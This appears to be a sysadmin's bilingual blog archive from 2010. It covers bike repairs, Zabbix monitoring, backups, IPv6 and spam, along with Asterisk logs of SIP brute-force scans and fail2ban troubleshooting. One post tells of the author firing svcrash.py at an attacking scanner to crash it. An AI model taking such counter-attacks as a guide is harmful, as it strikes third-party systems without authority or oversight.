Update 16:20 Last report from EHPG (hiding under the scale on weather.idefix.net): EHPG 111425Z AUTO 20049G64KT 170V270 5000NDV -DZ FEW005/// BKN007/// OVC008/// 10/08 Q0978 49 knots, 64 knots gusts: 91 kilometer per hour sustained, 119 kilometer per hour gust. Windy! EHPG is oil platform P11-B. Maybe I should add a map 'Northsea' to the weather maps.

Having a look at DNSSEC, but for now my head explodes. Reading some howtos, getting weird errors and a 'now what?' when the signing is a success.

One of those moments where people get totally confused because something happens which is not 'in the script':

Via Video: Texas Middle School Pulls Off Miraculous Touchdown - Wired playbook

Gisteren even met de ligfiets en de defecte remklauw naar de fietsenmaker geweest, ook om iets te laten doen aan de koppeling voor de kinder-aanhanger.

De fietsenmaker (Wim Kok in Utrecht) was er van overtuigd dat ze met een paar dagen wel de remklauw konden repareren. Ik had echt verwacht dat de optie 'vervangen' zou zijn. Verrassend positief.
Update 2010-11-25: Die 'paar dagen' vielen zwaar tegen, toen ik er dus na twee en een halve week achteraan belde en maar eens langs ging waren ze er achter gekomen dat het niet te repareren zou zijn en of ze een vervangende remklauw moesten bestellen. Ja, dat was mijn originele vraag op 2010-11-06...
Update 2010-12-09: En uiteindelijk was (na erachteraanbellen..) de vervangende remklauw binnen. De Shimano m465 is niet meer leverbaar, de enige compatible mechanische remklauw voor een schijfrem is een Avid BB7 Mtn. Die weer net andere rempads gebruikt, dus zal ik voortaan 2 verschillende setjes op voorraad moeten houden.

Open new mail: 82 spams. Casino spams: 75. All for royalbelie / royalreleasable, which seems to be run from somewhere in Russia.

Mentioning your dayjob on your wikipedia userpage can also be wrong:

I have removed the mention of you being a system administrator (on your user page), as this could give the impression that you are an admin on this project, which you are not. If you mean that you are a sys admin on your own website, please feel free to re-add with the addition of "on my own website" or similar, but not something that other editors on the English Wikipedia may think shows that you are an admin on this project at the moment! Regards, -- PhantomSteve/talk|contribs\ 20:59, 31 October 2010 (UTC)

Strangely enough, the definition for System administrator on that exact same wikipedia I linked to said it correctly:

A system administrator, systems administrator, or sysadmin, is a person employed to maintain and operate a computer system and/or network. System administrators may be members of an information technology (IT) or Electronics and Communication Engineering department.

A new trick to learn to our zabbix monitoring setup at work is a check for SSL certificate lifetime. Something you don't have to check very often but it gives a lot of support effort when you are too late.

Based on Monitoring of SSL certificate expiration time - Zabbix forums I did some work but decided that perl was my weapon of choice. Resulting test script:

Script deleted, there is now a better version in updated the zabbix ssl certificate test script to be able to use starttls services.

Which I would like to run once per week. But zabbix wants to run every test at least once every 12 hours. Ok. The test is simple: start warning when the value drops below 2592000 (one month worth of seconds).

The next trick is to use the zabbix api access to get the list of hosts which are monitored for SSL certificates and publish the result in our internal documentation mediawiki. Still working on that bit: selecting hosts in a group and selecting the templates for each host. I want templates per host, because that will show which SSL port is tested.

That is also my first perl JSON programming. Which is just a lot of use of Data::Dumper to figure out what kind of interesting objects are returned and picking out the details I want.

The xs4all ipv6 tunnel kept having traffic for two reasons:

• Some external nameserver probes kept remembering the old address for ns2.idefix.net for a good three months after I changed it.
• One nntp peer did not pick up the move

I noticed this week that the traffic through the tunnel was dying out so I did a tcpdump of the traffic and it was all nntp. I tested whether I could disable that special route yet and that worked.

Finally, all traffic is migrated to native IPv6 and I can start shutting down the tunnel service after 9 years and 2 months.

And I promised the no-bed version too of Dutch language lesson #4. All audio editing and mixing done with audacity.

Audio credits for this version:

• Frog sound from freesound.org
• Cow sound from freesound.org
• Dog sound from freesound.org

My previous remarks about doing audio work and one system reinstalled with audio editing in mind had a good reason: I was working on audio for a podcast. Not my own, but a guest role in "First Life" with a Dutch language lesson. I numbered it number 4 because there may or may not have been 3 earlier lessons used in the Chub Creek podcast.

But after I recorded my stuff I never heard anything about it being actually used. As you can see the First Life podcast is on long hiatus so I guess it isn't working out.

So here is what I recorded. It's available in two versions, one with the music bed and one without as I'm still not too happy about the effect of the music bed.

A music bed is the background music (usually something light drum-like) you hear on the radio when the DJ is talking (or when the DJ takes a breath). US definitions of music bed (and english wikipedia) seem to focus more on use of music in the background of radio commercials.

Audio credits:

• Zappy drum loop from free-loops.com used as bed
• Frog sound from freesound.org
• Cow sound from freesound.org
• Dog sound from freesound.org

Amusing tidbit in my spam e-mail today:

It is my pleasure to contact you after going through your profile on pgp.cs.uu.nl/ on my search for friendship,please contact me on this my  email  address so that i can send you my picture and tell you more about myself.I will be happy to know a little about you and hobbies.

I don't see the page about my pgp key and its place in the pgp strong set being a friendship / dating profile page.

Vanmorgen deed de voorrem van mijn ligfiets ineens raar. Onderweg had ik niet veel tijd om te kijken wat precies want ik was al wat laat voor m'n werk. Maar vanavond de ligfiets opgehangen en de voorrem gedemonteerd en uitgebreid bekeken. Als ik de rem loslaat veert het geheel niet vanzelf terug. Het klinkt van binnen of er een veer in stukgegaan is. Ik kan het huis van dat mechanisme alleen met gespecialiseerd gereedschap openmaken omdat het dichtzit met torx schroefjes, dus ik weet het niet zeker. Maar hiermee wil ik niet verder rijden.

Tijd voor een verse remklauw dus. Aangezien het me al prima gelukt is om deze te demonteren van de fiets ga ik gewoon met de defecte remklauw naar een fietsenmaker 'doe mij een nieuwe van deze' en monteer de nieuwe zelf. Komende paar dagen maar even op de rechtopfiets naar het werk.

Now I use the home workstation jobs more for audio work I also want that data in the backup cycle on a regular basis. But backups happen when I sleep and normally the system is off when not in use.

Solution: kick the workstation awake using wake-on-lan. That is easy when I know the ethernet address for the active network card and set the system up right (which does mean the power use is non-zero).

18 5 * * Mon,Fri /usr/sbin/etherwake -i eth0.1 jobs

Nicely in sync with the backup scheme.

But that does mean the system is running which is not needed after the backup is done. But sometimes I leave it running overnight for some computation task(s). Solution, a script on the workstation which runs when the backup should be done at 07:10, somewhat less than 2 hours after the wake:

#!/bin/sh

# check if I'm awaken for backup, in that case: shutdown when there is no
# amanda process

if [ "`awk ' $1 < 7200 { print "ja" } ' < /proc/uptime`" = "ja" ]; then
        if [ "`pidof amandad`" = "" ]; then
                /sbin/shutdown -h now
        fi
fi

Only when the number of seconds uptime is less than 7200 (2 hours) and there is no amanda daemon left, the system will shutdown. Scheduled backups working, no needless running of the system and when it has been started with other reasons it won't shut down.
The detour via awk is because the -lt option of test doesn't like fractional numbers.

The SIP scanners are adaptive.. less than a week after some very noisy SIP scans I noticed what is either a bit of distribution or a lot of scanners starting:

[2010-10-31 23:12:50] NOTICE[8876] chan_sip.c: Registration from '"3164813366"<sip:3164813366@mm.nn.oo.pp>' failed for '124.181.83.62' - No matching peer found
[2010-10-31 23:12:50] NOTICE[8876] chan_sip.c: Registration from '"3164813366"<sip:3164813366@mm.nn.oo.pp>' failed for '124.181.83.62' - No matching peer found
[2010-10-31 23:12:50] NOTICE[8876] chan_sip.c: Registration from '"3164813366"<sip:3164813366@mm.nn.oo.pp>' failed for '124.181.83.62' - No matching peer found
[2010-10-31 23:12:50] NOTICE[8876] chan_sip.c: Registration from '"3164813366"<sip:3164813366@mm.nn.oo.pp>' failed for '124.181.83.62' - No matching peer found
[2010-10-31 23:12:50] NOTICE[8876] chan_sip.c: Registration from '"3164813366"<sip:3164813366@mm.nn.oo.pp>' failed for '124.181.83.62' - No matching peer found
[2010-10-31 23:12:50] NOTICE[8876] chan_sip.c: Registration from '"3164813366"<sip:3164813366@mm.nn.oo.pp>' failed for '124.181.83.62' - No matching peer found
[2010-10-31 23:12:50] NOTICE[8876] chan_sip.c: Registration from '"3164813366"<sip:3164813366@mm.nn.oo.pp>' failed for '124.181.83.62' - No matching peer found
[2010-10-31 23:12:50] NOTICE[8876] chan_sip.c: Registration from '"3164813366"<sip:3164813366@mm.nn.oo.pp>' failed for '124.181.83.62' - No matching peer found
[2010-10-31 23:12:50] NOTICE[8876] chan_sip.c: Registration from '"3164813366"<sip:3164813366@mm.nn.oo.pp>' failed for '124.181.83.62' - No matching peer found
[2010-10-31 23:12:50] NOTICE[8876] chan_sip.c: Registration from '"3164813366"<sip:3164813366@mm.nn.oo.pp>' failed for '124.181.83.62' - No matching peer found
[2010-10-31 23:12:50] NOTICE[8876] chan_sip.c: Registration from '"3164813366"<sip:3164813366@mm.nn.oo.pp>' failed for '124.181.83.62' - No matching peer found
[2010-10-31 23:53:30] NOTICE[8876] chan_sip.c: Registration from '"2731788806"<sip:2731788806@mm.nn.oo.pp>' failed for '218.206.248.132' - No matching peer found
[2010-10-31 23:53:30] NOTICE[8876] chan_sip.c: Registration from '"1540737811"<sip:1540737811@mm.nn.oo.pp>' failed for '218.206.248.132' - No matching peer found
[2010-10-31 23:53:30] NOTICE[8876] chan_sip.c: Registration from '"100"<sip:100@mm.nn.oo.pp>' failed for '218.206.248.132' - No matching peer found
[2010-10-31 23:53:30] NOTICE[8876] chan_sip.c: Registration from '"101"<sip:101@mm.nn.oo.pp>' failed for '218.206.248.132' - No matching peer found
[2010-10-31 23:53:30] NOTICE[8876] chan_sip.c: Registration from '"102"<sip:102@mm.nn.oo.pp>' failed for '218.206.248.132' - No matching peer found
[2010-10-31 23:53:30] NOTICE[8876] chan_sip.c: Registration from '"103"<sip:103@mm.nn.oo.pp>' failed for '218.206.248.132' - No matching peer found
[2010-10-31 23:53:30] NOTICE[8876] chan_sip.c: Registration from '"104"<sip:104@mm.nn.oo.pp>' failed for '218.206.248.132' - No matching peer found
[2010-10-31 23:53:30] NOTICE[8876] chan_sip.c: Registration from '"105"<sip:105@mm.nn.oo.pp>' failed for '218.206.248.132' - No matching peer found
[2010-11-01 00:12:04] NOTICE[8876] chan_sip.c: Registration from '"3002915279"<sip:3002915279@mm.nn.oo.pp>' failed for '62.224.47.239' - No matching peer found
[2010-11-01 00:25:01] NOTICE[8876] chan_sip.c: Registration from '"1291933398"<sip:1291933398@mm.nn.oo.pp>' failed for '201.240.145.112' - No matching peer found
[2010-11-01 00:51:52] NOTICE[8876] chan_sip.c: Registration from '"3816139978"<sip:3816139978@mm.nn.oo.pp>' failed for '187.14.130.217' - No matching peer found

Funny thing is another asterisk server saw the same patterns at the approximate same time from different IPs.

Albert Heijn Toy Story actie figuren:

• Woody
• Jessie
• Buzz Lightyear
• Lotso
• Bullseye
• RC
• Hamm
• Wheezy
• Rex
• Ruimtewezen (Squeeze)
• Chunk
• Sparks
• Stretch
• Sarge
• Dolly
• Soldaat

Debian release codenames:

• buzz
• rex
• bo
• hamm
• slink
• potato
• woody
• sarge
• etch
• lenny
• squeeze
• sid

Mijn conclusies: er zitten debian-gebruikers bij Albert Heijn. En als je alle figuurtjes bij elkaar hebt heb je net niet alle gebruikte namen voor Debian releases (Bo, Slink, Etch en Sid ontbreken dan).

Met mijn aanval van BBS-nostalgie na het opduiken van de nodige text files van Koos z'n Doos ook maar eens voorzichtig de nederlandse wikipedia pagina's over NEABBS en Bulletin Board System bijgewerkt.
Update: en daarna in een vlaag van overmoed ook mijn 'overlegpagina' leeggehaald omdat daar al tijden stond dat ik welkom ben op wikipedia, wat ik nu wel weet. Blijkbaar was dat niet de bedoeling, gelijk moest iemand er op duiken om dat terug te draaien en een ander dat weer corrigeren.

Interesting experience: trying to get a peek at a spamvertised website with lynx, and all of a sudden all the IPs of the site stop responding on port 80. Makes me think research with a bit of caution is unwanted. Maybe time to fake the user-agent to be a vulnerable Internet Explorer (although things like p0f will still detect linux, that's a bit harder to fake).

The spam was a faked facebook notification:

   Hi,
   You haven't been back to Facebook recently. You have received
   notifications while you were gone.

Easy to spot as fake: I can't go back to facebook because I don't have an account there. "Facebook" makes Echelon look like a childish attempt at gathering information about people so I'll skip.

All links in the mail were to http://yourrxpress.net/ which resolves to:

yourrxpress.net has address 88.255.78.101
yourrxpress.net has address 88.255.78.102
yourrxpress.net has address 86.55.211.121
yourrxpress.net has address 86.55.211.122
yourrxpress.net has address 86.55.211.123

Interesting that *all* IPs started to firewall after I tried two times with lynx.

I was in a bit BBS-nostalgic mood so I had a look at the old BBS tape and threw a number of files on-line at http://bbs.idefix.net/. The additions are in the Text files.
One of the additions is The canonical list of 'You Know When You've Been Hacking Too Long When' for which I was the maintainer for a while.
I lived both in the BBS world and the Internet world at the time (mostly Usenet!) so I brought good stuff from newsgroups like rec.humor to the BBS file archives.

The fail whale is gone! But, but, but ...

I introduced a MediaWiki at work (science ict department) to use for internal documentation. One of the things I wanted to try is pages in the wiki created or maintained from other sources.

I created a special namespace for pages with information from other sources, where normal users have no rights to edit pages. This is to make sure nobody tries to edit something which is maintained by a script from another source.

I started with something simple: the list of printers. The windows printserver is leading, so I want to fetch the list there and massage it to generate a list of printers and comments. The weapon of choice is perl and MediaWiki::Bot. The output of smbclient -N -L printserver takes one regexp to find printqueuenames and descriptions. For the overview of cups queues I can parse the output of lpstat -a. With a bit more digging into IPP it should also be possible to get a list of details of printers to link cups queues and their windows counterparts.

I can run this script from crontab each day and the history tracking in MediaWiki will start to help document when something changed. Another thing which we can stop worrying about.

I have visions of the future of automatically linking zabbix (which has a json interface) and mediawiki and maybe a further future with a good database of stuff which is a source of entries in zabbix and the wiki. Double work is unneeded, computers are much better at working with one canonical source and importing that in a lot of places.

And another asterisk SIP scan flood. It seems 213.77.26.82 also runs an old version svcrack, given the timing:

  9.001251 213.77.26.82 -> mm.nn.oo.pp SIP Request: REGISTER sip:mm.nn.oo.pp
  9.006190 213.77.26.82 -> mm.nn.oo.pp SIP Request: REGISTER sip:mm.nn.oo.pp
  9.011838 213.77.26.82 -> mm.nn.oo.pp SIP Request: REGISTER sip:mm.nn.oo.pp
  9.016725 213.77.26.82 -> mm.nn.oo.pp SIP Request: REGISTER sip:mm.nn.oo.pp
  9.021696 213.77.26.82 -> mm.nn.oo.pp SIP Request: REGISTER sip:mm.nn.oo.pp
  9.027144 213.77.26.82 -> mm.nn.oo.pp SIP Request: REGISTER sip:mm.nn.oo.pp
  9.032294 213.77.26.82 -> mm.nn.oo.pp SIP Request: REGISTER sip:mm.nn.oo.pp
  9.037223 213.77.26.82 -> mm.nn.oo.pp SIP Request: REGISTER sip:mm.nn.oo.pp
  9.042141 213.77.26.82 -> mm.nn.oo.pp SIP Request: REGISTER sip:mm.nn.oo.pp
  9.047801 213.77.26.82 -> mm.nn.oo.pp SIP Request: REGISTER sip:mm.nn.oo.pp
  9.052514 213.77.26.82 -> mm.nn.oo.pp SIP Request: REGISTER sip:mm.nn.oo.pp
  9.057900 213.77.26.82 -> mm.nn.oo.pp SIP Request: REGISTER sip:mm.nn.oo.pp

The left column is in seconds, so that is 0.06 seconds worth of traffic.

A bit of tcpdumping and an attempt with svcrash later it seems this is not the old version of the svcrack script as certain headers are updated (no more 1.1.1.1 IP address).. and the crash trick does not work. From the packet capture:

Session Initiation Protocol
    Request-Line: REGISTER sip:mm.nn.oo.pp SIP/2.0
        Method: REGISTER
        [Resent Packet: False]
    Message Header
        Via: SIP/2.0/UDP 213.77.26.82:5131;branch=z9hG4bK-1864113917;rport
            Transport: UDP
            Sent-by Address: 213.77.26.82
            Sent-by port: 5131
            Branch: z9hG4bK-1864113917
            RPort: rport
        Content-Length: 0
        From: "3992603480" <sip:3992603480@mm.nn.oo.pp>
            SIP Display info: "3992603480" 
            SIP from address: sip:3992603480@mm.nn.oo.pp
        Accept: application/sdp
        User-Agent: friendly-scanner
        To: "3992603480" >sip:3992603480@mm.nn.oo.pp>
            SIP Display info: "3992603480" 
            SIP to address: sip:3992603480@mm.nn.oo.pp
        Contact: sip:123@213.77.26.82:5131
            Contact Binding: sip:123@213.77.26.82:5131
                URI: sip:123@213.77.26.82:5131\r
                    SIP contact address: sip:123@213.77.26.82:5131\r
        CSeq: 1 REGISTER
            Sequence Number: 1
            Method: REGISTER
        Call-ID: 3252836054
        Max-Forwards: 70

I notified the abuse address for tpnet.pl, let's see what that does.
Update: Well, the flood of SIP packets from 213.77.26.82 stopped. 7484510 attack packets stopped by fail2ban rule.

Op een regenachtige zondagmiddag / avond de scanner aangezet. Bij het doorzoeken van de FM radio band (87.50 - 108.00 MHz) viel het me op dat ik in Utrecht op zondagmiddag geen enkele radiopiraat kon horen, terwijl zondagmiddag toch wel de ideale tijd is voor radio piraten. Magoed, agentschap telecom is daar tegenwoordig streng op. Verder was het grappig om op de 27 MHz kanalen iemand te horen die uitgebreid over z'n medische problemen aan het vertellen was.

Google being actually slow over IPv6. Looks like IPv6 within googlenet is lossy:

$ traceroute6 www.google.com
traceroute to www.google.com (2a00:1450:8001::68) from 2001:980:14ca:2:21f:e1ff:fe45:2894, port 33434, from port 44229, 30 hops max, 60 byte packets
 1  eth0-3.idefix.net (2001:980:14ca:2:21f:c6ff:fe59:76f6)  0.984 ms  1.138 ms  1.193 ms 
 2  lo1.dr4.1d12.xs4all.net (2001:888:0:4401::1)  20.699 ms  46.655 ms  19.687 ms 
 3  2001:888:0:4403::2 (2001:888:0:4403::2)  43.353 ms  15.605 ms  14.354 ms 
 4  0.ge-1-2-0.xr1.sara.xs4all.net (2001:888:2:2::1)  16.748 ms  25.312 ms  15.390 ms 
 5  pr61.ams04.net.google.com (2001:7f8:1::a501:5169:1)  16.627 ms  16.499 ms  *
 6  * 2001:4860::1:0:4b3 (2001:4860::1:0:4b3)  16.892 ms  *
 7  2001:4860::1:0:2a (2001:4860::1:0:2a)  21.734 ms  52.506 ms  44.668 ms 
 8  * * 2001:4860::34 (2001:4860::34)  74.322 ms 
 9  2001:4860:0:1::1b (2001:4860:0:1::1b)  47.581 ms  61.300 ms  90.075 ms 
10  2a00:1450:8001::68 (2a00:1450:8001::68)  62.479 ms  * *

and a few minutes later it works again :)

A very nice example of "why let facts get in the way of a good story": Google mapping team gets 'lost'.

EVEN the boffins behind Google's revolutionary Street View can get LOST.

This employee was snapped reading a roadside MAP despite being on a mission to collect images for the world's most popular photographic database of towns and cities.

They were forced to pull over on the side of a remote stretch of road in Elsrijkdreef, near Amsterdam, where one of the team had to get out and consult a map as well as appearing to call for help.

With a photo credit(?) for Newsteam.co.uk.

Image (C) google streetview

The angle / view / granularity of the picture combined with the fact that the cars are not pulled over at all made me think it is a streetview photo itself and browsing around the Elsrijkdreef in Amsterdam shows this nicely: lots of images with three other streetview cars in the picture.

My best guess is that there were four streetview cars, with the picture from the first one and they passed a bystander who was peering at the map. I can duplicate the situation with streetview but I can't (at the moment) get the correct deeplink. So a screengrab will have to do.

If you want to look at your apache logfiles in Hollywood-style, try logstalgia which makes apache look like a sort of pong game. Needs a videocard with OpenGL. And access to the access_log of a busy server.

The SIP scanner on 62.48.49.40 must be using an older version of SIPvicious: a number of hours after fail2ban automatically blocked the IP the traffic rose to about 50 kilobyte/second of SIP REGISTER requests. The rule set by fail2ban has until now dropped 3291335 tries.

The older version also means svcrash.py works. So I had to give it a try, and that did wonders for the flood: it directly stopped. If the owner of the SIP scanner wants to discuss this attack on his systems by me, please do.

The traffic is back to a 'trickle' (about 10 seconds between requests). All mails to varous abuse addresses haven't worked yet.

Another heavy hitter SIP scan attack:

[2010-10-20 16:36:31] NOTICE[1516] chan_sip.c: Registration from '"2758977752"<sip:2758977752@mm.nn.oo.pp>' failed for '62.48.49.40' - No matching peer found
[2010-10-20 16:36:31] NOTICE[1516] chan_sip.c: Registration from '"717551073"<sip:717551073@mm.nn.oo.pp>' failed for '62.48.49.40' - No matching peer found
[2010-10-20 16:36:31] NOTICE[1516] chan_sip.c: Registration from '"100"<sip:100@mm.nn.oo.pp>' failed for '62.48.49.40' - No matching peer found
[2010-10-20 16:36:31] NOTICE[1516] chan_sip.c: Registration from '"101"<sip:101@mm.nn.oo.pp>' failed for '62.48.49.40' - No matching peer found
[2010-10-20 16:36:31] NOTICE[1516] chan_sip.c: Registration from '"102"<sip:102@mm.nn.oo.pp>' failed for '62.48.49.40' - No matching peer found

..

[2010-10-20 19:33:56] NOTICE[1516] chan_sip.c: Registration from '"5616" <sip:5616@mm.nn.oo.pp>' failed for '62.48.49.40' - No matching peer found
[2010-10-20 19:33:56] NOTICE[1516] chan_sip.c: Registration from '"5616" <sip:5616@mm.nn.oo.pp>' failed for '62.48.49.40' - No matching peer found

Causing (until now) 108704 log entries like these. The downside is that I have to stop these by hand (the 'rejected' SIP messages are filling the ADSL upstream). Somehow fail2ban fails to ban these. The test says nicely they are seen:

# fail2ban-regex /var/log/asterisk/messages /etc/fail2ban/filter.d/asterisk.conf

    62.48.49.40 (Wed Oct 20 19:33:55 2010)
    62.48.49.40 (Wed Oct 20 19:33:55 2010)
    62.48.49.40 (Wed Oct 20 19:33:56 2010)
    62.48.49.40 (Wed Oct 20 19:33:56 2010)

But somehow, the running fail2ban doesn't notice the messages or doesn't act on them. Since fail2ban is in python and multithreaded I can't debug it. All I see is a failure to regularly scan /var/log/asterisk/messages for new messages.
Update: Lots of debugging later: I made a typo in the ignoreip option in the general fail2ban config, and the code which parses this only runs as part of a python thread and the error gets ignored. Fixed that and now it works:

[Fail2Ban] ASTERISK: banned 62.48.49.40

De adsl lijn speelde de laatste dagen buienradar: na een fikse bui zakte de snelheid flink in en namen de hikken toe. Ik heb maar weer eens gebeld met de xs4all helpdesk, maar zolang de sessie niet volledig verbroken wordt door lijnkwaliteit problemen kan KPN er niet op afgestuurd worden. Als oplossing maar de lijn teruggezet naar een 10 megabit profiel, maar voorlopig blijft de stabiliteit matig. Ik denk toch dat er ergens een matige las ofzo in de draad zit die steeds meer ellende aan het opleveren is. Je zou bijna de pppd settings aanpassen om wat sneller de verbinding te verbreken. Da's alleen zo onhandig in huis.

This is cool: Alcatel-Lucent Bell Labs has republished the archives of the Bell System Technical Journal, 1922-1983 from 1922 - 1983. Lots of information in there, including research behind what are now common theories in information science.

Triggered by a question I was browsing around on the Defense Information Systems Agency website and noticed this little gem in avoiding information leaks: DISN data services has this nice image of a soldier at a console of a data center. The tags on the nearby servers have been made fuzzy so you can't (ab)use this picture ;)
Image probaby (c) Copyright US army.

It seems a telephone DDoS attack on citibank London was tried. I see a lot of attempts to call +44-20-7500-5000 in the Asterisk logs, and this matches to this listing for citibank London with the incorrect display of the number (either use +44-20-7500-5000 or 020-7500-5000).

[2010-10-13 07:10:08] NOTICE[1516] chan_sip.c: Call from '' to extension '#442075005000' rejected because extension not found.
[2010-10-13 07:10:08] NOTICE[1516] chan_sip.c: Call from '' to extension '0#442075005000' rejected because extension not found.
[2010-10-13 07:10:08] NOTICE[1516] chan_sip.c: Call from '' to extension '00442075005000' rejected because extension not found.
[2010-10-13 07:10:08] NOTICE[1516] chan_sip.c: Call from '' to extension '00#442075005000' rejected because extension not found.
[2010-10-13 07:10:09] NOTICE[1516] chan_sip.c: Call from '' to extension '000442075005000' rejected because extension not found.

[2010-10-13 07:10:20] NOTICE[1516] chan_sip.c: Call from '' to extension '995442075005000' rejected because extension not found.
[2010-10-13 07:10:20] NOTICE[1516] chan_sip.c: Call from '' to extension '99599442075005000' rejected because extension not found.
[2010-10-13 07:10:20] NOTICE[1516] chan_sip.c: Call from '' to extension '998442075005000' rejected because extension not found.
[2010-10-13 07:10:20] NOTICE[1516] chan_sip.c: Call from '' to extension '9999442075005000' rejected because extension not found.
[2010-10-13 07:10:20] NOTICE[1516] chan_sip.c: Call from '' to extension '9442075005000' rejected because extension not found.

Asterisk was kind enough to log the source:

[2010-10-13 07:10:28] WARNING[1516] chan_sip.c: Maximum retries exceeded on transmission 355498004-01909399823-101602981@218.16.119.153 for seqno 102 (Critical Response)
[2010-10-13 07:10:28] WARNING[1516] chan_sip.c: Maximum retries exceeded on transmission 1252672785-00018196951-458183090@218.16.119.153 for seqno 102 (Critical Response)
[2010-10-13 07:10:28] WARNING[1516] chan_sip.c: Maximum retries exceeded on transmission 2001768799-01552085073-741882079@218.16.119.153 for seqno 102 (Critical Response)

Which seems to be a known source for SIP attacks.

Ik heb er niets over on-line kunnen vinden maar ik heb wel vertrouwen in Rudolf van der Berg die in een discussie via (o.a.) Twitter nog even opmerkte dat het hernieuwde overleg over het aanbieden van BBC kanalen via andere aanbieders dan die bij de Vecai in alle stilte mislukt is.

internetthought Why does BBC allow Swisscom to broadcast it's channels, but not Dutch FTTH providers to do the same?

khoos @internetthought those 'new talks' between BBC UK and ftth providers we heard about aren't delivering anything yet...

internetthought @khoos just look at the swisscom broadband tV site. They even have Channel 4 and 5, Ceebeebies and ITV. And the talks have failed yes

Fun with rechargeable batteries: two GP NiMh 2300 mAh batteries. One spent months in my MP3 player, sometimes playing stuff. The other was sitting in a drawer. When the battery in my MP3 player stopped I wanted to change to the other one, but that one was empty enough too that the MP3 player would not boot. So self-discharge takes more out of the batteries than my MP3 listening I guess.

It seems there is an entire business model in having websites which show up in google searches for 'product type manual' and then either may have a manual but require you to jump through many hoops (giving them your e-mail address, entering captcha codes) or think a brochure pdf for a range of products is also a manual or plainly show somewhere hidden between the ads that more people are looking for that manual and it would be awesome if someone uploaded it to that site. Names like safemanuals.com, manualsonline.com and fixya.com are the first few who just annoyed me. In the end going to the attic and searching the box found the paper manuals which have the info I need.

There is a large spam network behind this money mule recruitment spam doing the rounds:

Building & Investment Company is pleased to offer you an excellent-paid part-time vacancy for the position of Administrative Assistant(Representative). You would work from the comfort of your home office or in our office, it would depend on your choice.

I'm receiving it on several addresses from all over the world, which shows there is a serious spam network behind this. The fact that whoever mails this is in such a need of money mules in the Netherlands shows that there is a bigger criminal organisation behind it.

Don't fall for it: you will be assisting in crime.

In het kort: dit is werk als 'money mule' en dat is een gegarandeerde manier om een veroordeling voor fraude op te lopen. Doe het niet.

Large IPv6 implementations with ISPs are happening! According to Deutsche Telekom konkretisiert IPv6-Pläne - Heise online every T-DSL based connection in Germany will be dual stack before the end of 2011:

Die Deutsche Telekom wird bis Ende 2011 bundesweit alle DSL-Anschlüsse auf den Dual-Stack-Betrieb mit IPv4 und IPv6 umstellen. Das erklärte Konzernsprecher Hans-Martin Lichtenthäler auf Anfrage von heise Netze.

If I have my numbers correct, there are 11.5 million DSL lines with Deutsche Telekom. That is a LOT of end-users getting dual-stack connectivity.

PinDr0p is a system for tracing call paths across multiple phone networks released by Georgia Tech. The first application they mention is detecting "vishing" (Voice phishing), the call center of your bank should not be routed via a satellite path and a voip exchange in Lagos.

My first thought was: "will it detect the clicks, clangs and noises from old electromechanical switches". That might be even easier than the modern delays, jitter and packet loss.

Found via Voice-routing call fingerprint system fights 'vishing' - The Register. I love the 'Actually, I don't think my bank has a Lagos call centre' byline.
Update I asked the above question about electromechanical exchanges to the media contact for the research, who forwarded it to the researcher. The researcher found it an interesting question and thinks it is doable.

Danny Burstein asks an interesting question in comp.risks:

And once again we're treated to a malware warning, make that a near hysterical warning (especially the way it was covered by the mass media) which leaves out a key point, namely which computer operating systems and software packages are potentially affected.

When there's a safety concern with cars, there's no reluctance in publicizing the brand name. Even when the company is a major advertiser.

Why do we see so much hesitation in computer issues?

An interesting question. You don't hear mainstream news telling another microsoft windows virus is doing the rounds.

AdB once had a very good idea, putting warnings on windows software boxes just like on cigarette boxes:

If only certain other packaging had to devote half the front panel
to a huge black-and-white ``WINDOWS BOTNETS''.  Sure, verbification
weirds language, but given that the remaining space is being given over
to M$'s marketing department, it should fit right in.

Implementing a blacklist check in zabbix was a bit more complicated than I originally thought. Searching for it found Monitor DNS blacklist entries - zabbix forums which points at Monitor DNS blacklist entries with Zabbix - Penumbra where shell scripts are suggested. I decided to rewrite stuff in perl using Net::DNS because I wanted a bit more robustness.

Well, as the docs for Net::DNS say:

BUGS
       "Net::DNS" is slow.

checking 89 blacklists took about 25 seconds. Default external checks in zabbix need to be done in 3 seconds.

As a crummy workaround I now run the checks from cron every 15 minutes which dump the result in a tempfile and the check is on the content of the tempfile, also every 15 minutes. Crude, but effective.

Just had a look at backscatterer.org (one of the IPs I'm testing zabbix rbl checks on is listed). And found this gem:

This IP is temporary listed. The listing will expire automatically and free of charge 4 weeks after the last abuse is seen from that IP.
Expedited manual expressdelisting is available as an option, in case you do not want to wait for the automatic and free expiration.
You will be charged 74 EUR

Lots of terms I can think of, but my first one which is nice enough to publish is 'extortion racket'.

Interesting SIP attack in the logs just now:

[2010-10-04 13:56:40] NOTICE[24598] chan_sip.c: Registration from '"4282946309"<sip:4282946309@xx.xx.xx.xxx>' failed for '211.234.117.92' - No matching peer found
[2010-10-04 13:56:41] NOTICE[24598] chan_sip.c: Registration from '"2466009100"<sip:2466009100@xx.xx.xx.xxx>' failed for '211.234.117.92' - No matching peer found
[2010-10-04 13:56:48] NOTICE[24598] chan_sip.c: Registration from '"2466009100" <sip:2466009100@xx.xx.xx.xxx>' failed for '211.234.117.92' - No matching peer found
[2010-10-04 13:56:49] NOTICE[24598] chan_sip.c: Registration from '"2466009100" <sip:2466009100@xx.xx.xx.xxx>' failed for '211.234.117.92' - No matching peer found

.. 10815 entries skipped

[2010-10-04 14:02:00] NOTICE[24598] chan_sip.c: Registration from '"2466009100" <sip:2466009100@xx.xx.xx.xxx>' failed for '211.234.117.92' - No matching peer found

I guess an entire dictionary flew by in somewhat over 5 minutes, causing some delay on the line.

Er is nog genoeg te vinden op de scanner, je moet als scannerluisteraar alleen iets meer moeite steken in het zichtbaar maken van de signalen. Ook de politie blijkt nog bruikbare informatie te strooien door de lucht, blijkt uit onderzoek van Frequency Monitor Centre: Ernstig informatielek Politie Rotterdam-Rijnmond : middels het (verder technisch mooie) mobitex systeem van RAM mobile data wordt onversleuteld data uitgewisseld. De 'smoking gun' is natuurlijk dat de gegevens van de extra beveiliging van Balkenende gewoon te ontvangen zijn.

Niet alleen de nigeriaanse oplichters hebben nu google translate ontdekt om krom Nederlands te schrijven, maar ook andere oplichters. Vandaag spam van webmenshirts.com met de prachtige zinsconstructie:

Al onze ontwerpen zijn wasbaar in de machine 30° voor basis-onderhoud eenvoudig.

Mijn reactie op de Consultatie "wetsvoorstel versterking bestrijding computercriminaliteit" :

Reactie op "wetsvoorstel versterking bestrijding computercriminaliteit"

Voor wat betreft de optie tot vordering ontoegankelijk maken van gegevens:

